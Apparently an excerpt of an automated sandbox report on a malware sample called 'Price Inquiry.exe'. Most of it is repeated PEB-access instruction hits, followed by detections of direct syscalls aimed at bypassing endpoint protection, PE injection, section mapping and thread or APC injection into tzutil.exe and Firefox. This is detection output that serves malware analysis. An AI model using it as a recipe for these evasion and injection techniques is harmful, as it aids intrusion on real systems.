Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766870 mov eax, dword ptr fs:[00000030h]	4_2_01766870
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766870 mov eax, dword ptr fs:[00000030h]	4_2_01766870
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175E872 mov eax, dword ptr fs:[00000030h]	4_2_0175E872
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175E872 mov eax, dword ptr fs:[00000030h]	4_2_0175E872
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01700854 mov eax, dword ptr fs:[00000030h]	4_2_01700854
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E2840 mov ecx, dword ptr fs:[00000030h]	4_2_016E2840
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4859 mov eax, dword ptr fs:[00000030h]	4_2_016D4859
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4859 mov eax, dword ptr fs:[00000030h]	4_2_016D4859
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A830 mov eax, dword ptr fs:[00000030h]	4_2_0170A830
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177483A mov eax, dword ptr fs:[00000030h]	4_2_0177483A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177483A mov eax, dword ptr fs:[00000030h]	4_2_0177483A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov eax, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov eax, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov eax, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov ecx, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov eax, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F2835 mov eax, dword ptr fs:[00000030h]	4_2_016F2835
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175C810 mov eax, dword ptr fs:[00000030h]	4_2_0175C810
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0170C8F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0170C8F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0179A8E4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE8C0 mov eax, dword ptr fs:[00000030h]	4_2_016FE8C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175C89D mov eax, dword ptr fs:[00000030h]	4_2_0175C89D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0887 mov eax, dword ptr fs:[00000030h]	4_2_016D0887
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CCB7E mov eax, dword ptr fs:[00000030h]	4_2_016CCB7E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177EB50 mov eax, dword ptr fs:[00000030h]	4_2_0177EB50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01778B42 mov eax, dword ptr fs:[00000030h]	4_2_01778B42
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766B40 mov eax, dword ptr fs:[00000030h]	4_2_01766B40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766B40 mov eax, dword ptr fs:[00000030h]	4_2_01766B40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179AB40 mov eax, dword ptr fs:[00000030h]	4_2_0179AB40
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FEB20 mov eax, dword ptr fs:[00000030h]	4_2_016FEB20
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FEB20 mov eax, dword ptr fs:[00000030h]	4_2_016FEB20
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01798B28 mov eax, dword ptr fs:[00000030h]	4_2_01798B28
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01798B28 mov eax, dword ptr fs:[00000030h]	4_2_01798B28
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174EB1D mov eax, dword ptr fs:[00000030h]	4_2_0174EB1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0175CBF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FEBFC mov eax, dword ptr fs:[00000030h]	4_2_016FEBFC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8BF0 mov eax, dword ptr fs:[00000030h]	4_2_016D8BF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8BF0 mov eax, dword ptr fs:[00000030h]	4_2_016D8BF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8BF0 mov eax, dword ptr fs:[00000030h]	4_2_016D8BF0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0BCD mov eax, dword ptr fs:[00000030h]	4_2_016D0BCD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0BCD mov eax, dword ptr fs:[00000030h]	4_2_016D0BCD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0BCD mov eax, dword ptr fs:[00000030h]	4_2_016D0BCD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F0BCB mov eax, dword ptr fs:[00000030h]	4_2_016F0BCB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F0BCB mov eax, dword ptr fs:[00000030h]	4_2_016F0BCB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F0BCB mov eax, dword ptr fs:[00000030h]	4_2_016F0BCB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0177EBD0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01784BB0 mov eax, dword ptr fs:[00000030h]	4_2_01784BB0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01784BB0 mov eax, dword ptr fs:[00000030h]	4_2_01784BB0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0BBE mov eax, dword ptr fs:[00000030h]	4_2_016E0BBE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0BBE mov eax, dword ptr fs:[00000030h]	4_2_016E0BBE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174CA72 mov eax, dword ptr fs:[00000030h]	4_2_0174CA72
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174CA72 mov eax, dword ptr fs:[00000030h]	4_2_0174CA72
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177EA60 mov eax, dword ptr fs:[00000030h]	4_2_0177EA60
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170CA6F mov eax, dword ptr fs:[00000030h]	4_2_0170CA6F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170CA6F mov eax, dword ptr fs:[00000030h]	4_2_0170CA6F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170CA6F mov eax, dword ptr fs:[00000030h]	4_2_0170CA6F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0A5B mov eax, dword ptr fs:[00000030h]	4_2_016E0A5B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0A5B mov eax, dword ptr fs:[00000030h]	4_2_016E0A5B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6A50 mov eax, dword ptr fs:[00000030h]	4_2_016D6A50
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FEA2E mov eax, dword ptr fs:[00000030h]	4_2_016FEA2E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170CA38 mov eax, dword ptr fs:[00000030h]	4_2_0170CA38
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170CA24 mov eax, dword ptr fs:[00000030h]	4_2_0170CA24
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F4A35 mov eax, dword ptr fs:[00000030h]	4_2_016F4A35
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F4A35 mov eax, dword ptr fs:[00000030h]	4_2_016F4A35
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175CA11 mov eax, dword ptr fs:[00000030h]	4_2_0175CA11
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170AAEE mov eax, dword ptr fs:[00000030h]	4_2_0170AAEE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170AAEE mov eax, dword ptr fs:[00000030h]	4_2_0170AAEE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01704AD0 mov eax, dword ptr fs:[00000030h]	4_2_01704AD0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01704AD0 mov eax, dword ptr fs:[00000030h]	4_2_01704AD0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0AD0 mov eax, dword ptr fs:[00000030h]	4_2_016D0AD0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01726ACC mov eax, dword ptr fs:[00000030h]	4_2_01726ACC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01726ACC mov eax, dword ptr fs:[00000030h]	4_2_01726ACC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01726ACC mov eax, dword ptr fs:[00000030h]	4_2_01726ACC
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8AA0 mov eax, dword ptr fs:[00000030h]	4_2_016D8AA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8AA0 mov eax, dword ptr fs:[00000030h]	4_2_016D8AA0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01726AA4 mov eax, dword ptr fs:[00000030h]	4_2_01726AA4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01708A90 mov edx, dword ptr fs:[00000030h]	4_2_01708A90
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DEA80 mov eax, dword ptr fs:[00000030h]	4_2_016DEA80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4A80 mov eax, dword ptr fs:[00000030h]	4_2_017A4A80
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01768D6B mov eax, dword ptr fs:[00000030h]	4_2_01768D6B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0D59 mov eax, dword ptr fs:[00000030h]	4_2_016D0D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0D59 mov eax, dword ptr fs:[00000030h]	4_2_016D0D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0D59 mov eax, dword ptr fs:[00000030h]	4_2_016D0D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8D59 mov eax, dword ptr fs:[00000030h]	4_2_016D8D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8D59 mov eax, dword ptr fs:[00000030h]	4_2_016D8D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8D59 mov eax, dword ptr fs:[00000030h]	4_2_016D8D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8D59 mov eax, dword ptr fs:[00000030h]	4_2_016D8D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8D59 mov eax, dword ptr fs:[00000030h]	4_2_016D8D59
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01758D20 mov eax, dword ptr fs:[00000030h]	4_2_01758D20
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01788D10 mov eax, dword ptr fs:[00000030h]	4_2_01788D10
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01788D10 mov eax, dword ptr fs:[00000030h]	4_2_01788D10
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01704D1D mov eax, dword ptr fs:[00000030h]	4_2_01704D1D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EAD00 mov eax, dword ptr fs:[00000030h]	4_2_016EAD00
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EAD00 mov eax, dword ptr fs:[00000030h]	4_2_016EAD00

Source: C:\Users\user\Desktop\Price Inquiry.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Price Inquiry.exe

Memory written: C:\Users\user\Desktop\Price Inquiry.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: NULL target: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\tzutil.exe

Thread register set: target process: 6128

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\tzutil.exe

Thread APC queued: target process: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Process created: C:\Users\user\Desktop\Price Inquiry.exe "C:\Users\user\Desktop\Price Inquiry.exe"	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: pfyyryeDyx.exe, 00000008.00000002.4626790276.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000000.2358254414.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000000.2506231060.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: pfyyryeDyx.exe, 00000008.00000002.4626790276.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000000.2358254414.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000000.2506231060.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: pfyyryeDyx.exe, 00000008.00000002.4626790276.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000000.2358254414.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000000.2506231060.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: pfyyryeDyx.exe, 00000008.00000002.4626790276.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 00000008.00000000.2358254414.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000000.2506231060.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Users\user\Desktop\Price Inquiry.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
